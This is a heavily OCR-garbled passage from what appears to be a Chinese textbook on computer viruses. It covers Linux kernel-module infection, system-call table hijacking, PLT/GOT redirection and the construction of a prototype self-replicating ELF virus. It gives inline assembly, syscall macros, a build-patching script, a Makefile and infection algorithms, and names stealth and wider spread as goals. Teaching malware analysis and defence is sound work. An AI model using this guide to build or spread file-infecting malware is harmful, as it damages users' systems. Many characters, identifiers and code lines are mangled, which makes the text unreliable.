程序 ,用 来 扩展 Linux 内 核 功能 。LKM 可 以 很 容易 地 动态 加 载 到 内 核 中 而 不 需要 重新 编 
译 内 核 。 通 常 使 用 LKM 用 来 加 载 一 些 设备 驱动 ,可 以 捕获 系统 调用 ,功能 十 分 强大 。 

与 一 般 程序 不 同 的 是 LKM 没有 main() 田 数 ,提供 的 是 init_module() 和 cleanup_ 
module() 两 个 函数 。 第 一 个 是 初始 化 函数 ,用 来 初始 化 所 有 数据 ,第 二 个 是 关闭 函数 ,用 来 
清除 数据 ,从 而 安全 地 退出 。 对 LKM 的 感染 就 是 在 这 两 个 函数 中 做 手脚 。 

其 实 LKM 病毒 编写 并 不 复杂 ,基本 原理 就 是 通过 修改 . strtab 和 . symtab 中 的 字符 串 
来 实现 ,修改 这 两 个 节 中 存储 的 init 函数 的 地 址 ,将 其 修改 成 其 他 的 函数 就 是 在 模块 加 载 时 
执行 其 他 的 函数 。 修 改过 程 也 很 简单 ,查找 这 两 个 节 , 依 次 循环 读 取 每 个 节 中 的 表 项 , 读 取 
后 与 查找 的 字符 串 比 较 , 如 果 相 等 , 则 返回 该 字符 串 偏 移 并 修改 成 别 的 函数 名 。 因 此 感染 
LKM 前 先 要 了 解 目标 文件 中 的 相关 符号。 其 中 LKM 的 目标 文件 中 的 . symtab 和 . strtab 
节 是 很 重要 的 获取 符号 名 称 的 途径 。 对 于 符号 表 中 表 项 里 的 st_name 是 需要 关注 的 ,这 是 
. strtab 节 的 一 个 索引 ,符号 的 名 称 都 存储 在 . strtab 节 中 。 通 过 从 . symtab 节 中 查 到 . strtab 
中 茶 个 字符 串 的 俩 移 , 然 后 修改 这 个 字符 串 ,由 于 . strtab 节 存 储 的 是 一 系列 非 空 字符 串 , 因 
此 有 一 个 限制 就 是 修改 后 的 字符 串 长 度 不 能 超过 原来 的 字符 串 , 这 跟 溢出 类 似 , 超 过 后 就 会 
覆盖 后 面 的 字符 串 。 

现在 考虑 的 问题 就 是 如 何 加 已 有 的 模块 中 插入 新 的 代码 ,实现 的 方法 是 使 用 链接 天 
1d ,链接 的 两 个 模块 共享 彼此 的 符号 。 另 外 一 个 限制 是 几 个 模块 中 不 能 有 同名 和 人 符号。 链接 
后 的 模块 经 过 修改 符号 表 或 字符 串 表 便 可 以 执行 插入 代码 ,而 不 是 原来 的 代码 。 

为 了 保持 感染 模块 的 隐蔽 性 ,必须 使 修改 过 的 init_module 辆 数 仍然 能 够 执行 先前 的 功 
能 , 即 在 感染 代码 中 调用 原来 的 init module 困 数 。 

在 编 好 程序 进行 感染 调试 的 过 程 中 ,可 以 通过 readelf 和 objdump 工具 不 断 进 行 对 
ELF 格式 文件 内 容 查看 ,确定 是 否 成 功 感染 。 

可 以 利用 感染 LKM 做 很 多 重要 的 事情 ,这 是 其 他 感染 普通 的 可 执行 ELF 文件 不 可 能 实 
现 的 功能 。 其 中 LKM 的 一 个 用 途 是 截获 系统 调用 ,使 正常 的 系统 调用 来 执行 日 定义 的 任务 。 
只 需要 改变 sys_call_table 中 相应 的 人口 就 可 以 达到 截获 系统 调用 的 目的 。 步 又 如 下 。 

(1) 找到 需要 修改 的 系统 调用 在 sys_call_tablel j 中 的 入 口 , 可 以 查看 文件 /usr/ 
include/sys /syscall. h 。 

(2) 保存 sys_call_tablel xj 的 原 指 针 ,用 来 完成 原 系 统 调用 的 功能 ,防止 程序 运行 出 错 。 
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(3) 将 自 定义 的 新 函数 指针 放 和 人 sys_call_tablel xj 中 ,将 保存 的 原 指 针 放 人 新 的 系统 调 
用 函数 中 来 实现 原 有 调用 。 
2. PLT/GOT 动 持 实现 


对 于 两 个 ELF 文件 之 间 的 链接 ,链接 编辑 器 (Link Editor) 解 决 不 了 两 个 文件 之 间 执 行 
转移 的 问题 ,因此 将 包含 程序 转移 控制 的 人口 放 入 程序 链接 表 中 (Program Linker Table， 
PLT)。 动 态 链接 颖 会 根据 这 些 表 项 决定 目标 的 绝对 地 址 并 修改 GOT 表 中 的 相关 表 项 。 
ELF 文件 中 的 全 局 偏 移 表 (Global Offset Table, GOT) 能 够 把 与 位 置 无 关 的 地 址 定位 到 绝 
对 地 址 。 

感染 ELF 文件 的 PLT 表 是 利用 了 PLT 在 搜索 库 调 用 时 的 重要 性 ,可 以 修改 相关 代码 
来 跳 转 到 自己 定义 的 感染 代码 中 ,取代 原来 的 库 调 用 ,实现 病毒 传染 。 通 过 感染 可 执行 文件 
并 修改 PLT 表 导 致 共享 库 重 定 问 来 实现 病毒 ,并 且 在 取代 之 前 保存 原来 的 GOT 状态 ,可 
以 在 执行 完 病毒 代码 后 重新 调用 恢复 原来 的 库 调 用 。 修 改 PLT 表 中 的 代码 需要 将 文本 段 
修改 为 可 写 的 权限 ,否则 会 造成 感染 失败 。 

对 PLT 实现 重 定 问 的 算法 具体 可 以 进行 如 下 描述 。 

(1) 将 文本 段 修改 为 可 写 权 限 。 

(2) 保存 PLT 入 口 点 。 

(3) 使 用 新 的 库 调用 地 址 蔡 代 原 入 口 。 

(4) 对 新 的 库 调 用 中 代码 的 修改 实现 新 的 库 调 用 的 功能 ,保存 原来 的 PLT 入 口 ,调用 
原来 的 库 调用 。 


4.6 Linux ELF 病毒 实例 


本 市 将 在 前 面 理论 的 基础 上 编写 一 个 病毒 原型 ,本 病毒 原型 主要 由 C 请 言 编 写 , 少 部 
分 无 法 由 C 语言 来 完成 的 底层 操作 采取 GCC 内 骨 汇 编 的 方式 实现 。 


4.6.1 病毒 技术 汇总 


本 次 病毒 实例 的 实现 程序 结合 了 两 种 稼 见 的 传染 技术 , 即 4. 5 节 感 染 技术 中 介绍 的 文本 
段 之 后 填充 区 感染 和 数据 段 之 后 感染 的 方法 ,在 本 次 病毒 示例 中 用 到 的 相关 技术 说 明 如 下 。 

1. 修订 病毒 代码 的 方法 

由 于 病毒 代码 先 于 和 宿主 程序 执行 ,并 且 为 了 防止 被 发 现 , 要 在 病毒 执行 结束 后 跳 转 到 箱 主 
程序 入 口 处 执行 , 即 交 还 控制 权 的 过 程 ,因此 需要 根据 不 同 的 感染 宿主 对 病毒 代码 进行 修订 。 
有 很 多 种 方法 交还 控制 权 , 这 里 仅 介绍 两 种 ,它们 都 是 通过 GCC 内 鹃 汇编 的 形式 来 实现 的 。 

第 一 种 方法 是 利用 movl 和 jmp 两 条 指令 的 组 合 来 实现 , 跳 转 到 原 答 主 代码 入 口 点 ,本 
病毒 程序 使 用 的 是 这 种 技术 。 代 码 如 下 。 


asm_ _ volatile ( 
"movl OxAAAABBBB % % eax\n\t" 
"jmp % % eax\n" 
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上 面 的 0xAAAABBBB 代表 原宿 主 文件 的 入 口 点 地 址 ,在 感染 过 程 中 会 被 修改 ,修改 
的 程序 如 下 。 


x (int x )&Virus[JMP OFFSET] = OldEntry; 


JMP_OFFSET 是 0xAAAABBBB 位 置 在 病毒 体 中 的 偏 移 。 

另外 一 种 方法 就 是 利用 push 和 ret 的 组 合 , 即 跳 转 到 宿主 文件 入 口 点 。 

上 面 的 0xAAAABBBB 是 代表 原宿 主 文件 的 入 口 点 地 址 ,在 感染 过 程 中 会 被 修改 。 修 
改 的 指令 如 下 。 


_asm Volatile ( 
"push xAABBCCDD\n\t" / x* push ret address */ 
"ret\n" 


> 


2. 两 次 编译 修改 宏 

源 程序 写 好 后 ,并 不 知道 编译 后 病毒 体 的 大 小 ,必须 在 编译 后 利用 objdump 反 汇 编程 序 查 
看 得 知 病毒 体 的 大 小 以 及 movl 0xAAAABBBB %eax 指令 到 病毒 体 起 始 位 置 的 偏 移 量 JMP_ 
OFFSET, 以 及 通过 查找 virus() 和 virus_end() 匈 数 来 定位 病毒 体 大 小 VIRUS_SIZE, 根 据 这 两 
个 获得 的 值 修改 两 个 头 文件 virus. h 和 infector. h, 将 修正 virus. h 中 的 JMP_OFFSET 和 
VIRUS_SIZE 以 及 infector. h 中 的 _JMP_OFFSET 和 _VIRUS_SIZE 宏 定 义 。 

这 些 都 是 通过 脚本 完成 的 ,脚本 的 名 称 是 get_patch. sh, 脚 本 内 容 如 下 。 


#!/bin/bash 

objdump —d infect |grep "<virus>" > patch 

objdump — d infect |grep aaaabbbb 之 patch 

objdump - d infect |grep "<virus end>" >> patch 

base = 'cat patch|grep "<virus>:" |cut ~-c2—8' 

jmp addr = 'cat patch|grep aaaabbbb |cut —-c2—8' 

virus end= 'cat patch|grep "<virus end>" |cut -cc2—8' 
JMP OFFSET= 'echo $ (($((16# $ jmp addr))— $ ((16# $ base))))' 
((JMP_OFFSET++ ) ) 

VIRUS _ SIZE = 'echo $ (($ ((16# $virus end))— $ ((16# $base))))， 
sed '/\#define /d' infector.h > tmpl 

echo "#define JMP OFFSET $ JMP OFFSET" >> tmpl 

echo "#define VIRUS SIZE § VIRUS SIZE" >> tmpl 

rm 一 下 infector.h 

mv tmpl infector.h 

sed '/\#define JMP OFFSET/d' virus.h > tmp2 

sed '/\# define VIRUS SIZE/d' tmp2 > tmpl 

echo " 井 define JMP OFFSET $ JMP OFFSET" >> tmpl 

echo " 井 define VIRUS SIZE $ VIRUS SIZE" >> tmpl 

了 和 上 上 -本 TU 了 

mv tmpl virus.h 

rm —f tmp2 

echo "VIRUS SIZE= $ VIRUS SIZE" 

echo "JMP OFFSET= $ JMP OFFSET 
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在 脚本 中 得 到 的 JMP_OFFSET 差 值 需要 加 一 ,因为 要 定位 到 AAAABBBB 位 置 需要 
跳 过 一 个 字 节 的 指令 符号 。 修 正好 的 两 个 头 文件 再 次 进行 编译 。Make all 命令 执行 后 得 到 
的 就 是 含有 病毒 体 的 infect 可 执行 文件 。 

3. 编译 选项 设置 

编译 选项 选择 的 依据 是 尽量 使 病毒 代码 体积 小 使 执行 效率 提高 ,基于 这 两 点 来 选择 编 
译 选项 。 

编译 选项 见 Makefile 文件 ,代码 如 下 。 

CC = gcc 


CFLAGS =- c ~ fomit~ frame~ pointer ~ Wall 
CLEANFILES = virus.o infect 


all: infect 
infect: infector.c virus.o 

$ (CC) $< virus.o -0o infect - Wall 
Virus. 0:T1rus.C 

$ (CC) $< 8$ (CELAGS) — 0 virus.o 
clean: 

rm 一 下 $ (CLEANFILES) 


4. 两 种 感染 方法 的 选择 和 共存 

在 病毒 实现 中 使 用 两 种 感染 方法 ,目的 是 扩大 能 够 被 感染 的 程序 范围 。 由 于 这 两 种 感 
染 方法 各 有 所 长 ,因此 必须 结合 实际 的 可 执行 文件 来 判断 使 用 哪 种 感染 方法 进行 感染 才能 
够 优势 互补 并 且 消 除 每 种 感染 方法 的 缺陷 。 

目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,优先 使 用 文本 段 填充 区 感染 的 方法 ,如果 填 
充 区 比 病毒 的 体积 小 , 则 上 月 动 切换 到 使 用 数据 段 之 后 感染 的 方法 。 可 以 在 以 后 的 设计 中 增 
加 一 个 随机 函数 来 随机 确定 使 用 哪 一 种 方法 进行 感染 ,这 样 更 能 提高 病毒 的 隐蔽 性 和 碍 杀 
病毒 的 难度 。 

另外 感染 融 的 实现 也 有 两 种 感染 方法 ,因此 感染 天 需要 3 个 参数 ,第 三 个 参数 是 text 
或 data, 以 它 来 确定 使 用 哪 一 个 段 进行 感染 。 部 分 病毒 对 文本 段 感染 方法 不 适合 ,只 能 使 用 

在 感染 大 中 提供 一 个 参数 int method ,根据 这 个 参数 的 值 来 判断 经 过 哪 一 个 感染 流程 。 

同样 ,在 病毒 体 源 代码 中 ,也 有 一 个 method 参数 , 放 在 判断 是 否 可 以 进行 文本 段 填充 
感染 的 位 置 。 该 参数 取 值 策略 决定 了 病毒 体 传播 时 选择 传染 方法 的 策略 。 

程序 判断 完 使 用 的 感染 方法 ,再 根据 method 的 值 来 指定 经 过 哪 一 个 感染 流程 ,对 于 大 
部 分 的 流程 ,这 两 种 感染 方法 还 是 相同 的 。 

5. 随机 感染 当前 和 上 层 目 录 

当前 病毒 尚未 开发 这 个 功能 ,为 了 防止 被 发 现 ,可 以 通过 增加 一 个 随机 函数 来 实现 随机 
感染 ,当前 病毒 只 是 一 个 演示 版 本 ,执行 只 感染 一 个 ELF 文件 ,并 且 只 感染 当前 目录 的 第 一 
个 读 出 未 被 感染 的 文件 。 使 用 随机 感染 的 优点 是 更 加 隐蔽 ,使 系统 管理 员 难 以 发 现 感染 规 
律 ,从 而 增长 病毒 生存 期 。 这 是 该 病毒 未 来 实现 的 功能 。 
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当前 病毒 使 用 读 取 方法 ,只 是 为 了 演示 ,所 以 只 读 取 当 前 目录 未 被 感染 的 一 个 文件 ,并 
不 具有 强大 的 传染 性 。 

病毒 具体 是 通过 一 个 循环 体 实 现 的 。 它 不 断 读 取 当 前 的 文件 夹 中 的 文件 ,并 用 
checkelf 函数 检查 ,直到 有 一 个 满足 该 函数 要 求 , 即 该 函数 返回 值 为 0 时 ,循环 体 退出 。 开 
始 对 该 文件 实现 感染 。 

使 用 checkelf 曙 数 检查 合格 文件 的 dir 一 d_name 表示 的 文件 名 进行 传染 。 

对 于 文件 是 否 被 感染 的 判断 可 以 放 在 checkelf 函数 中 进行 ,判断 的 基准 可 以 利用 
e_ident[ 中 的 保留 位 , 申 于 保留 位 默认 为 0, 因此 大 为 0 则 为 未 被 感染 的 可 执行 文件 ,各 不 
为 0, 可 以 设 定 一 定 的 值 来 标识 被 哪 种 方法 感染 ,也 可 以 不 设 定 ,只 将 其 中 一 位 设 为 非 0, 例 
如 ,本 病毒 中 将 e_identL15j] 设 为 非 0 来 表示 已 经 被 感染 了 , 遇 到 这 一 类 的 文件 ,病毒 体会 自 
动 跳 过 , 谈 取 当前 文件 夹 的 下 一 个 文件 。 

6. 寄存 器 的 保存 与 恢复 


寄存 需 保 在 和 恢复 需要 在 病毒 体 执行 前 后 分 别 执行 人 栈 和 出 栈 指令 , 即 利 用 到 push 和 
pop 指令 。 


push 指令 是 压 栈 ESP = ESP- 4 
pop 指令 是 出 栈 ESP = ESP+ 4 


由 于 是 跳 转 到 病毒 体 所 在 位 置 执 行 病毒 代码 ,因此 为 了 能 够 在 病毒 体 执行 结束 后 安全 
地 交换 控制 权 给 原 箱 主 文件 代码 ,必须 在 病毒 体 执行 前 保存 通用 寄存 硕 , 并 且 在 病毒 体 执行 
之 后 恢复 这 些 寄存 器 的 值 。 尝 试 使 用 pushal 以 及 popal 指令 来 完成 这 项 工作 ,最 终 的 结果 
是 病毒 体感 染 其 他 文件 时 会 出 现 段 错误 (Segmentation Fault) ,因为 保存 了 多 余 的 %esp 寄 
存 带 ,这 个 寄存 絮 保 留 的 是 堆栈 的 指针 ,因此 不 需要 保存 和 恢复 ,去 除 这 个 寄存 带 后 ,对 其 他 
的 寄存 带 进 行 保存 和 恢复 便 可 以 正常 执行 了 。 使 用 到 的 保存 寄存 带 的 代码 如 下 。 


_asm _ volatile ( 
"push % % eax\n\t" 
"push % % ecx\n\t" 
"push % % edx\n\t" 
"push % % ebx\n\t" 
"push % % ebp\n\t" 
"push % % esi\n\t" 
"push % % edi\n\t"::); 


使 用 到 的 恢复 寄存 需 的 代码 如 下 。 


asm volatile ( 
"popl % % edi\n\t" 
"popl % % esi\n\t" 
"popl % % ebp\n\t" 
"popl % % ebx\n\t" 
"popl % % edx\n\t" 
"popl % % ecx\n\t" 
"popl % % eax\n\t" 
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注意 到 两 次 插入 的 内 骸 汇 编 代码 顺序 是 相反 的 。 

7. 字符 串 使 用 

该 病毒 实现 并 没有 使 用 太 多 字符 串 , 只 使 用 了 一 个 “.”, 使 用 的 方法 就 是 将 这 个 字符 串 
放 入 一 个 数组 就 可 以 了 ,因为 这 个 字符 串 很 简单 ,没有 必要 使 用 破坏 程序 流程 的 方法 。 

病毒 代码 中 使 用 字符 串 比 较 麻 烦 , 需 要 动态 获得 字符 串 地 址 ,因为 病毒 体 转 移 到 新 的 箱 
主 中 时 ,对 于 字符 串 的 绝对 地 址 的 引用 就 会 改变 。 本 病毒 代码 使 用 的 字符 串 的 方法 参考 
Silvio Cesare 的 UNIX ELF Parasites and Virus 中 提供 的 方法 。 利 用 了 缓冲 区 溢出 中 
shellcode 的 编写 技术 。 

Jmp A 

Bs 

pop % eax ; eax 现在 含有 字符 串 的 地 址 

ns 


call B 
.string "hello" 


A 中 就 是 字符 串 "hello" 的 地 址 。 从 而 可 以 使 用 这 个 地 址 来 调用 字符 串 。 

8. 不 使 用 C 库 函 数 

对 于 调用 的 C 库 函 数 都 将 在 头 文件 中 重新 编写 ,因为 调用 外 部 的 C 库 会 造成 病毒 体 在 
不 同 的 和 宿主 内 无 法 执行 的 结果 。 为 了 将 所 有 的 图 数 调用 都 发 生 在 病毒 体内 ,将 月 己 重 新 编 
写 的 系统 调用 放 和 病毒 体 。 这 些 图 数 的 实现 放 和 人 头 文 件 virus.h 中 。 

重新 利用 系统 调用 ,内 骸 汇 编 以 及 int 0x80 中 断 来 编写 需要 的 限 数 ,在 virus.h 中 的 内 
容 如 下 。 


static inline _SVYyscal12(1int，fstat，int，filedes，struct stat * ,buf); 

static inline syscalll(void, exit, int, status); 

static inline _syscall3(int, open, const char * ,file,int, flag, int, mode); 
static inline _syscalll(int, close, int, fd); 

static inline  _ syscall3(off t, lseek, int ,filedes, off t, offset, int,whence); 
static inline _ syscall3(ssize t, read, int ,fd, void x*x, buf, size t,count); 
static inline _syscall3(ssize t, write, int ,fd, const void x*x, buf, size t,count); 


static inline _syscall3(int, getdents, uint, fd, struct dirent x , drip, uint, count); 


上 上面 的 _syscalll 、_syscall2、_syscall3 的 定义 如 下 ,这 是 通过 内 和 瞬 含有 系统 调用 的 汇 
编 语 言 代 码 来 实现 的 ,具体 实现 如 下 。 


#define _syscalll(type,nanme, typel,argl) \ 
type name (typel argl) \ 
1 
long res; \ 
asm _ volatile ( "int $ 0x80 " \ 
:"=a" (_ res) \ 
: "0" (__NR ##name), "b" ((long)(argl))); \ 
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return (type) _res; \ 
} 
井 define _ syscall2(type,name,typel,argl,type2,arg2) \ 
type name (typel argl, type2 arg2)\ 


{\ 
long __res; \ 
_ asm volatile ("int $ 0x80" \ 
:"=a"( res) \ 
: "0" (__NR ###name), "b" ((long)(arg1)),"c" ((long)(arg2))); \ 
return (type) _res; \ 
} 


#define _syscall3(type,name,typel,argl,type2,arg2, type3,arg3) \ 
type name( typel argl, type2 arg2, type3 arg3) \ 
1 

long __res; \ 

_ asm _ volatile ("int $ 0x80" \ 


:"=a" ( res) \ 
:"0" (__NR_ 提 #name),"b" ((long)(argl)), "c" ((long) (arg2)), "d"((long) 
(arg3))); \ 
return (type) __res; \ 
} 


对 于 使 用 到 的 memcpy 函数 ,也 同样 需要 用 内 通 汇 编 的 方法 来 实现 ,直接 将 函数 的 内 藤 
汇编 定义 复制 一 份 放 到 virus. h 头 文 件 中 。 本 程序 中 复制 的 是 memcpy 程序 。 

对 某 些 宏 定 义 , 在 virus. h 中 也 需要 目 己 声明 ,在 本 病毒 体内 目 己 声明 的 C 库 中 的 宏 有 
SEEK_SET(0) 、 SEEK_CUR(1) 和 SEEK_END(2) 。 

9. 关于 代码 体积 

对 于 第 一 种 ELF 文件 文本 段 填充 区 感染 方法 ,应 该 尽量 减少 代码 的 体积 ,这 样 才能 使 
被 感染 的 ELF 可 执行 文件 更 多 ,病毒 广泛 传播 的 空间 更 大 。 

压缩 代码 体积 可 以 通过 编译 选项 进行 优化 减少 系统 调用 次 数 等 方法 ,在 本 病毒 程序 中 
的 应 用 有 对 节 和 有 段 使 用 指针 大 块 恋 取 , 实 现 方 法 代码 就 是 将 整个 程序 头 表 统 一 谈 人 一 个 数 
组 中 ,然后 对 这 一 块 内 存 区 域 进 行 操作 ,主要 利用 指针 对 内 存 进行 操作 实现 的 。 

循环 执行 对 程序 头 表 的 查找 和 修改 ,代码 是 根据 指针 指 回 地 址 逐渐 增加 的 原理 来 实现 
的 。 最 后 修改 完 执 行 一 次 将 所 有 程序 头 统 一 写 和 人 的 代码 。 

对 于 节 表 的 查找 与 修改 利用 相似 的 方法 。 目 的 是 减 小 生成 的 病毒 体 的 体积 。 

10. 使 用 到 C 库 中 的 数据 结构 

由 于 程序 中 使 用 到 了 glibc 中 的 一 些 数据 结构 ,并 且 不 能 包含 C 库 困 数 , 因 此 必须 目 己 
将 这 些 数据 结构 的 定义 复制 到 头 文件 中 。 使 用 到 的 数据 结构 主要 有 dirent 和 stat 两 个 。 
数据 结构 具体 定义 如 下 。 
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struct dirent 
{ 
long d_ino; 
EL 
unsigned short d_ reclen; 
char d_name[ 256]; 
}; 


struct stat { 
unsigned long st _ dev; 
unsigned long st ino; 
unsigned Short st mode; 
unsigned short st nlink; 
unsigned short st uid; 
unsigned Short st gid; 
unsigned long st rdev; 
unsigned long st size; 
unsigned long st blksize; 
unsigned long st blocks; 
unsigned long st atime; 
unsigned long st atime nsec; 
unsigned long st mtime; 
unsigned long st mtime nsec; 
unsigned long st ctime; 
unsigned long st ctime nsec; 
unsigned long _ unused4; 
unsigned long _ unused5; 

}; 


11. 病毒 代码 执行 时 获得 起 始 地 址 

第 一 次 感染 利用 已 经 指定 的 病毒 体 函 数 地 址 来 实现 取 病 毒 和 感染 过 程 ,但 是 当 病 毒 体 
自身 执行 的 时 候 是 没有 把 自身 当 作 函数 执行 的 ,因此 必须 添加 内 骨 汇 编 代 码 来 重新 定位 病 
毒 代 码 起 始 地 址 或 者 文件 偏 移 。 

有 两 种 方法 可 以 实现 ,首先 是 加 入 内 藤 汇 编 代 码 , 在 病毒 体 执行 过 程 中 读 栈 ,将 放置 在 
栈 内 某 位 置 处 的 argvL0j 地 址 读 出 ,从 而 获得 当前 病毒 体 代 码 所 属 ELF 格式 文件 的 路 径 , 病 
毒 体 所 在 文件 偏 移 位 置 可 以 根据 文件 ELF 头 中 的 和 人口 点 地 址 或 者 文本 段 程序 头 中 的 filesz 
字段 来 获得 ,然后 由 文件 偏 移 量 读 到 病毒 体 代 码 起 始 处 , 青 将 病毒 体 代码 从 文件 中 读 取 复制 
一 个 副本 到 新 的 宿主 内 ,由 此 进行 传染 。 

读 取 argvL0j 可 以 参考 栈 顶 的 结构 。 内 核 在 运行 应 用 程序 之 前 要 在 堆栈 最 顶部 建立 一 
个 参数 块 ,默认 配置 下 参数 块 最 大 为 32 个 页 面 。 堆栈 最 顶部 (0xBFFFFFFC) 的 字 保 留 为 
0, 接 下 来 依次 为 执行 文件 名 字符 串 .环境 字 符 串 表 、 命 令 行 参数 字符 串 表 及 处 理 硕 名称 字符 
串 ,然后 是 一 段 辅 助 信息 表 、 环 境 字 符 串 指针 表 和 命令 行 字 符 串 指针 表 , 最 后 是 命令 行 参 数 
数量 argc。 


112 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


另外 一 种 方法 就 是 本 病毒 使 用 的 方法 ,利用 了 缓冲 区 溢出 编程 中 的 一 个 技巧 来 获取 。 
就 是 用 jmp/call 组 舍得 到 movl 0xAAAABBBB %% eax 指令 的 地 址 。 这 个 地 址 是 
0xAAAABBBB 地 址 向 后 一 个 movl 指令 ,而 0xAAAABBBB 的 地 址 就 是 那个 用 于 存放 病毒 
代码 返回 地 址 的 地 址 ,这 个 地 址 相对 于 病毒 代码 起 始 地 址 的 偏 移 是 已 知 的 , 即 病 毒 代码 函数 
问 ELF Infector 接口 提供 的 那个 宏 定义 的 值 。 

具体 代码 如 下 。 


_asm _ Volatile( 
"jmp A\n" 

"B:\n" 

:" = m" (jmp addr) 
Es 


asm volatilel( 


"jmp C\n" 

“ANnt” 

"call B\n" 

"nt 

"mov] $ OxAAAABBBB, % % eax\n\t" 
"jmp * % % eax\n" 

i 


头 文件 的 宏 定义 相关 内 容 : 


//define JMP OFFSET 2336 
//define VIRUS SIZE 2895 


病毒 代码 在 当前 宿主 内 存 映 像 中 的 位 置 就 可 以 得 到 了 。 根 据 获 取 的 movl 
0xAAAABBBB %eax 指令 地 址 反 推 出 病毒 代码 起 始 地 址 。 由 于 已 经 知道 这 条 指令 在 病毒 
代码 中 的 偏 移 , 即 JMP_OFFSET.， 


start addr = (jmp addr + 1— JMP OFFSET); 


第 一 种 方法 最 大 的 缺陷 是 需要 插入 大 量 的 内 骸 汇 编 代码 , 即 在 编译 时 保存 frame 
pointer, 然 后 用 %ebp 寄存 硕 进 行 栈 内 位 置 侦 移 查找 ,并 定位 argv[L0j] 内 存 地 址 所 存 的 位 置 。 
可 以 发 现 很 难 从 栈 内 轻易 读 出 argvL0] 来 ,耗费 大 量 空间 却 仍然 存在 恋 取 不 成 功 的 可 能 性 ， 
所 以 本 程序 优先 选择 第 二 种 方法 实现 。 

12. inline 函数 

使 用 inline 函数 将 小 的 函数 插入 病毒 代码 中 ,使 病毒 体能 够 以 一 个 类 似 函 数 的 完整 程 
序 存在 。 但 由 于 inline 关键 字 仅 仅 是 建议 ,而 不 是 强制 ,对 于 某 些 特别 大 的 男 数 ,编译 器 默 
认 不 会 将 这 些 函 数 插 和 调用 位 置 ,因此 利用 inline 时 只 完成 一 些 较 小 的 工具 性 函数 ,而 主要 
感染 代码 放 入 到 病毒 函数 主体 内 。 


4.6.2 原型 病毒 实现 
前 面 已 经 说 明了 本 次 病毒 示例 中 用 到 的 相关 技术 。 现 在 开始 介绍 实现 的 细节 ,提供 原 
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型 病毒 的 伪 代 码 以 及 流程 图 ,并 介绍 编译 感 染 过 程 。 以 实践 的 方式 使 读者 了 解 Linux ELF 
病毒 的 原理 与 概念 。 

1. 设计 思想 

通过 先前 一 系列 的 研究 分 析 , 得 到 一 个 制造 实现 Linux 下 感染 ELF 病毒 的 方案 ,未 
步 分 析 实 现 一 个 具有 感染 ELF 文件 能 力 的 Linux 病毒 原型 ,并 对 该 病毒 进行 演示 测试 
研究 。 

本 病毒 原型 主要 由 C 语言 编写 , 少 部 分 无 法 由 C 语言 来 完成 的 底层 操作 采取 GCC 内 
和 藤 汇编 的 方式 实现 。 

在 本 次 病毒 实例 的 实现 程序 中 ,结合 了 两 种 常见 的 传染 技术 : 文本 段 之 后 填充 区 感 
染 和 数据 段 之 后 感染 。 选 择 这 两 种 感染 方法 是 由 于 它们 各 有 所 长 ,因此 必须 结合 实际 的 
可 执行 文件 来 判断 使 用 哪 种 感染 方法 进行 感染 才能 够 优势 互补 并 且 消 除 每 种 感染 方法 
的 缺陷 。 

目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,首先 优先 使 用 文本 段 之 后 填充 区 感染 的 方 
法 ,如果 填充 区 比 病毒 的 体积 小 , 则 自动 切换 到 使 用 数据 段 之 后 填充 病毒 的 方法 。 

关于 病毒 的 架构 ,该 病毒 包含 两 部 分 ,病毒 体 代码 部 分 以 及 传染 副 部 分 ,要 在 编译 完 后 
使 用 感染 右 将 病毒 注入 第 一 个 宿主 文件 ,然后 执行 这 个 被 感染 的 宿主 文件 时 便 会 进行 文件 
感染 。 这 个 病毒 包含 的 文件 有 如 下 几 个 。 

(1) get_patch. sh: 用 来 修订 文件 中 两 个 宏 定 义 的 bash 脚本 文件 。 

(2) infector. c: 感染 天 程序 。 

(3) infector.h: 感染 器 程序 的 头 文件 。 

(4) Makefile: Makefile 文件 。 

(5) virus. c: 病毒 体 的 源 文件 。 

(6) virus. h: 病毒 体 头 文件 。 

设计 的 大 致 思想 就 是 先 把 病毒 体 编译 成 目标 文件 ,再 编译 感染 天 使 其 与 病毒 体 链接 并 
包含 病毒 体 ,然后 用 get_patch. sh 脚本 获取 跳 转 位 置 和 病毒 体积 来 修订 每 个 头 文 件 中 的 两 
个 宏 。 再 次 编译 后 便 是 具有 感染 能 力 的 含有 病毒 体 的 感染 天 了 ,第 一 次 感染 是 利用 感染 天 
来 将 病毒 体 以 使 用 者 选择 的 方式 注入 到 指定 的 ELF 文件 中 去 的 。 然 后 执行 文件 ,病毒 体 先 
于 原宿 主 代码 执行 ,执行 过 程 中 会 读 取 当前 目录 中 的 一 个 合适 的 可 执行 文件 ,然后 判断 这 个 
文件 的 文本 段 和 数据 段 之 间 是 否 有 足够 的 填充 空间 来 容纳 病毒 体 , 如 果 有 就 用 文本 段 填 充 
的 方法 进行 感染 ,如 果 没 有 就 利用 数据 段 后 面 填 充 病毒 的 原理 进行 感染 。 

总 体 来 说 ,病毒 的 设计 思路 是 很 简单 的 ,两 种 感染 方法 的 算法 在 4.5 节 的 内 容 中 有 详细 
的 讲述 。 这 里 只 把 最 终 算 法 列举 一 下 ,病毒 体 和 感染 融 都 可 以 使 用 这 两 种 算法 进行 病毒 
感染 。 

2. 实现 过 程 

可 将 本 病毒 演示 分 为 几 个 大 的 模块 ,首先 是 第 一 个 宿主 感染 , 即 利用 感染 器 的 模块 ,第 
二 个 模块 是 病毒 体 模块 。 感 染 右 模块 和 病毒 体 模块 分 别 实现 ,并 且 利 用 感染 絮 的 涉 文 件 中 
的 两 个 函数 声明 链接 在 一 起 。 

在 算法 实现 过 程 上 ,可 以 分 为 感染 算法 、 目 标 选 择 算法 和 感染 方法 选择 算法 。 
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感染 算法 有 两 种 ,分 别 是 文本 段 之 后 填充 感染 算法 和 数据 段 之 后 填充 感染 算法 ,两 种 算 
法 的 具体 介绍 可 以 参考 4.5 苘 的 相关 内 容 , 这 里 只 列举 两 种 算法 的 最 终 描述 。 

第 一 种 算法 是 文本 段 后 填充 感染 ,具体 步骤 如 下 。 

(1) 增加 ELF header 中 的 e_shoff , 增 大 PAGESIZE 大 小 。 

(2) 修正 插入 代码 使 其 能 够 跳 转 到 原 主体 代码 的 入 口 点 。 

(3) 定位 文本 段 程序 头 : 修改 ELF 头 的 入 口 点 地 址 指 癌 新 的 入 口 点 (p_vaddr 十 
p_filesz) ; 增加 p_filesz 包含 新 代码 ; 增加 p_memsz 包含 新 代码 。 

(4) 对 于 文本 段 最 后 一 节 的 shdr: 增 大 sh_size 加 上 寄生 代码 的 大 小 。 

